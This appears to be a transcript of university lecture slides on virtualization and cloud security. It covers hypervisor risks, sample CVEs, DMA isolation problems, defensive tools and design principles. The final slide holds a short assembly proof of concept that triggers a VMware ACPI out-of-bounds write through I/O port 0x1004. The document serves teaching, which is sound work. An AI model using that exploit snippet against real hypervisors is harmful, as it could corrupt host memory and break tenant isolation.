Virtualization and Cloud Security - PowerPoint PPT Presentation

About This Presentation
Title:

Virtualization and Cloud Security

Description:

Virtualization and Cloud Security Huzur Saran IIT Delhi Typical Cloud hw hypervisor m1 m2 m3 m4 m5 hw hypervisor m1 m2 m3 m4 m5 hw hypervisor m1 m2 m3 m4 m5 hw ... – PowerPoint PPT presentation

Number of Views:190
Avg rating:3.0/5.0
Slides: 17
Provided by: erne154
Category:

less

Transcript and Presenter's Notes

Title: Virtualization and Cloud Security


1
Virtualization and Cloud Security
  • Huzur Saran
  • IIT Delhi

2
Typical Cloud
Cloud API
m1
m2
m3
m4
m5
m1
m2
m3
m4
m5
m1
m2
m3
m4
m5
hypervisor
hypervisor
hypervisor
hw
hw
hw
m1
m2
m3
m4
m5
m1
m2
m3
m4
m5
hypervisor
hypervisor
hw
m1
m2
m3
m4
m5
hw
m1
m2
m3
m4
m5
hypervisor
m1
m2
m3
m4
m5
hypervisor
hw
hw
hypervisor
hw
3
Typical Server Virtualization Deployment
Ubuntu
Win 2003
Win 2008
Redhat
App
App
App
App
App
App
App
App
App
App
App
App
Management
App
App
App
App
App
App
App
App
App
App
App
App
OS
OS
OS
OS
Hypervisor
Hardware
4
Typical VDI Deployment
desktop
desktop
desktop
desktop
desktop
desktop
Dom0
OS
OS
OS
OS
OS
OS
Enterprise Hypervisor
Hardware
Thin client
Thin client
Thin client
Thin client
Thin client
Thin client
5
Security Issues
  • Hypervisor is the underlying component of all
    these architectures. It is a new layer which
    needs to be protected
  • Scale of deployments Just the sheer scale of
    deployments make this a security nightmare.
    Imagine 150 machines running a simultaneous
    scheduled AV scan on the same physical host.
    Chokes IO/Disk bandwidth.
  • Isolation - Machines of a company and its
    competitor could be running on the same physical
    machine. Insufficient isolation could lead to
    disaster
  • New APIs to access Virtualization/Cloud
    services. Bugs in these could lead to compromise
    of entire infrastructure.

6
Sample Hypervisor Security Issues
  • CVE-2007-4496, CVE-2007-4497 ESX3.01, guest
    operating system can cause buffer overflow and
    arbitrary code execution in the host
  • CVE-2007-0948 Virtual PC Heap overflow which
    could cause arbitrary privilege escalation
  • CVE-2007-4993 Xen 3.0.3 User can escape to
    domain0 via grub.conf and pygrub

7
Security Issues Why?
  • Hypervisors are written by humans. They have bugs
    typically buffer overflows
  • Hypervisor are complex Xen is about 300K source
    lines of code
  • Complete isolation is hard Most systems dont
    have IOMMUs which make it possible to DMA to
    arbitrary physical memory
  • Compromised Domain0 on Xen pretty much means a
    hosed hypervisor. Domain0 runs commodity OSs
    which could have bugs.

8
Security Issues Why?
  • DMA is a big problem on non IOMMU based systems
  • Xen can setup DMA
  • Dom0 can setup DMA
  • Driver domains can setup DMA
  • The range of physical addresses is not verified
  • IOMMU based systems can restrict the range of
    addresses but they are not present in commodity
    hardware
  • There are some techniques to even bypass IOMMU
    checks

9
Security Solutions
  • Trusted hypervisor
  • Hyperguard Phoenix Technologies A hypervisor
    integrity scanner in SMM.
  • Deepwatch Intel project Virtualization
    rootkit scanner
  • Domain 0 Hardening Various security solutions
    to white-list and harden Dom0

10
Security Opportunities
  • New breed of security products is now possible to
    protect guest OSs from being hijacked
  • Hypervisor based security suites cannot be
    detected by malware running in the guest
  • Hypervisors allow introspection of very early
    boot sequences of the guest, thereby making
    possible an entire need breed of BIOS rootkit and
    kernel rootkit scanners

11
Security Opportunities
  • APIs like VMSAFE from VMWare allow introspection
    of interesting system events in the guests
  • These events can then be processed on a dedicated
    security appliance
  • These events include CPU state monitoring, page
    faults, memory/register accesses, File-system
    events, network events etc.

12
Early Trends Consolidate common security
functions to security appliance
AV
F W
AV
F W
AV
F W
AV
F W
AV
F W
AV
F W
OS
OS
OS
OS
OS
OS
Enterprise Hypervisor
Hardware
Security Appliance Manager
Antivirus
Firewall
OS
OS
OS
OS
OS
OS
Enterprise Hypervisor
AV Shim
FW Shim
Hardware
13
Security is hard at all levels
  • A prisoner was wrongly released after a fax was
    received from a grocery store stating that the
    Kentucky Supreme Court had demanded his release
    http//www.cnn.com/2007/US/04/21/wrongly.freed.ap
    /index.html

14
Security principles
  • Open designyou need all the help you can get
  • Economy of mechanism fewer things to get right
  • Minimize secrets secrets dont remain secret
  • Fail-safe defaults most users wont change them
  • Least privilege limit the damage of an accident
  • Separation of privilege dangerous operation
    should require multiple principals
  • Complete mediation check every operation

15
Sample Security Issues
  • http//taviso.decsystem.org/virtsec.pdf - Paper
    detailing several bugs in Virtual PC, Xen,
    Vmware, Parallels and BOCHS.
  • http//www.theregister.co.uk/2009/10/09/amazon_clo
    ud_bitbucket_ddos_aftermath/ - UDP flood based
    DDoS against Amazon EC2
  • Argument handling bugs in FLASK (Xen)

16
  • Example A specially crafted poke to I/O port
    0x1004, results in an out-of-bounds write to an
    attacker controlled location. By interacting with
    the power management subsystem in specific ways,
    a write to an arbitrary location can be performed
    upon restarting a suspended virtual machine.
  • VMware PIIX4 ACPI PM OOB Write
  • section .text
  • global _start
  • _start
  • mov eax, 110
  • mov ebx, 3
  • int 0x80a
  • mov ax, 0x6c81
  • mov dx, 0x1004
  • out dx, ax
  • xor ebx, ebx
  • xor eax, eax
  • inc eax
  • int 0x80
  • a. iopl()
Write a Comment
User Comments (0)
About PowerShow.com